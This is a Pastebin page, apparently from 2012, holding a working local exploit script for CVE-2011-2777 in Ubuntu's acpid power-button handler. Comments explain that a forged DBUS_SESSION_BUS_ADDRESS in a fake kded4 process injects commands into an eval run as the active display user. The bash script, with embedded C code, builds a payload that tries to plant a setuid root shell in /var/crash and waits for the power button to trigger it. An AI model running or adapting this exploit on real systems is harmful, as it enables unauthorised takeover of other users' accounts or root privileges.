API tools faq
paste
Advertisement
Topol

Acpid 1:2.0.10-1ubuntu2 Privilege Boundary Crossing Vulnerab

Topol
Aug 29th, 2012
86
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.12 KB | None | 0 0
raw download clone embed print report
  1. Exploit Title: Acpid Privilege Boundary Crossing Vulnerability
  2. Google Dork:
  3. Date: 23-11-2011
  4. Author: otr
  5. Software Link: https://launchpad.net/ubuntu/+source/acpid
  6. Version: 1:2.0.10-1ubuntu2
  7. Tested on: Ubuntu 11.10, Ubuntu 11.04
  8. CVE : CVE-2011-2777
  9. --
  10. Safeguard this letter, it may be an IMPORTANT DOCUMENT
  11.  
  12. #!/bin/bash
  13. #
  14. # otr
  15. #
  16. # The following script is executed when pressing the power button on an Ubuntu
  17. # 11.10 system. Depending on how far we get in the condition in the code
  18. # fragement, it is possible for another user on the local system to gain the
  19. # privileges of the user who has the currently focused display running. The
  20. # vulnerability only triggers when certain power management programms are not
  21. # running, especially kded4 and the programms in the $PMS variable need not to
  22. # be running in order for this to be exploitable.
  23. #
  24. # This exploit would be more reliable when having a way to dos
  25. # gnome-power-manager Also it would be more fun one could trick the getXuser
  26. # function into setting $XUSER to root. In the case of root being the user on
  27. # the active display this exploit turns into a privilege escalation
  28. #
  29. # Exploitable file /etc/acpi/powerbtn.sh
  30. # In original source code line 40
  31. #
  32. # --
  33. # PMS="gnome-power-manager kpowersave xfce4-power-manager"
  34. # PMS="$PMS guidance-power-manager.py dalston-power-applet"
  35. #
  36. # if pidof x $PMS > /dev/null ||
  37. # ( test "$XUSER" != "" && \
  38. # pidof dcopserver > /dev/null && \
  39. # test -x /usr/bin/dcop && \
  40. # /usr/bin/dcop --user $XUSER kded kded loadedModules \
  41. # | grep -q klaptopdaemon) ||
  42. # ( test "$XUSER" != "" && \
  43. # test -x /usr/bin/qdbus && \
  44. # test -r /proc/$(pidof kded4)/environ && \
  45. # su - $XUSER -c \
  46. # "eval $(echo -n 'export '; cat /proc/$(pidof kded4)/environ | \
  47. # tr '\0' '\n' | \
  48. # grep DBUS_SESSION_BUS_ADDRESS); \
  49. # qdbus org.kde.kded" | \
  50. # grep -q powerdevil) ;\
  51. # then
  52. # --
  53. #
  54. # The problem here is that the output of cat /proc/$(pidof kded4)/environ is
  55. # controllable by a local user by exporting the DBUS_SESSION_BUS_ADDRESS
  56. # variable and running a programm called kded4.
  57. # Using this environment variable the attack is able to inject arbitrary shell
  58. # commands into the eval expression which will be executed with the rights
  59. # of $XUSER which is the user with the currently active display.
  60. #
  61. # /usr/share/acpi-support/policy-funcs in the PowerDevilRunning function
  62. # has similar code but it seems that under normal conditions this only
  63. # allows to run code with the privileges one already has.
  64.  
  65. PAYLOADEXE="/var/crash/payload"
  66. PAYLOADC="/var/crash/payload.c"
  67.  
  68. KDEDC="kded4.c"
  69. KDEDEXE="kded4"
  70.  
  71. TRIGGER="/etc/acpi/powerbtn.sh"
  72.  
  73. rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC
  74.  
  75. echo "[+] Setting umask to 0 so we have world writable files."
  76. umask 0
  77.  
  78.  
  79. echo "[+] Preparing binary payload."
  80. # we _try_ to get a suid root shell, if not we only get a
  81. # shell for another user
  82. cat > $PAYLOADC <<_EOF
  83. #include <sys/stat.h>
  84. void main(int argc, char **argv)
  85. {
  86. if(!strstr(argv[0],"shell")){
  87. printf("[+] Preparing suid shell.\n");
  88. system("cp /var/crash/payload /var/crash/shell");
  89. setuid(0);
  90. setgid(0);
  91. chown ("/var/crash/shell", 0, 0);
  92. chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
  93. }else{
  94. execl("/bin/sh", "/bin/sh", "-i", 0);
  95. }
  96. }
  97. _EOF
  98. gcc -w -o $PAYLOADEXE $PAYLOADC
  99.  
  100. echo "[+] Preparing fake kded4 process."
  101. cat > $KDEDC <<_EOF
  102. #include <unistd.h>
  103. void main (){
  104. while(42){
  105. sleep(1);
  106. if( access( "/var/crash/shell" , F_OK ) != -1 ) {
  107. execl("/var/crash/shell", "/var/crash/shell", "-i", 0);
  108. exit(0);
  109. }
  110. }
  111. }
  112. _EOF
  113.  
  114. gcc -w -o $KDEDEXE $KDEDC
  115. rm -f $KDEDC $PAYLOADC
  116.  
  117. echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
  118. export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"
  119.  
  120. echo "[+] Starting kded4."
  121. echo "[+] Trying to PMS the system."
  122. echo "[+] Waiting for the power button to be pressed."
  123. echo "[+] You'll get a shell on this console."
  124. ./$KDEDEXE
  125.  
  126. rm $KDEDEXE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!